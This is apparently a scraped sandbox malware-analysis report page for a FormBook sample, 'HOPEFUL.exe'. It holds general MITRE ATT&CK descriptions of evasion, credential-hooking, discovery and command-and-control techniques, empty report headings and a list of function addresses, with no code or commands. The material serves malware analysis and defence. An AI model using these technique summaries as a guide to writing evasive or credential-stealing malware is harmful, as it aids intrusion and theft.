Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report HOPEFUL.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 00419D5D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre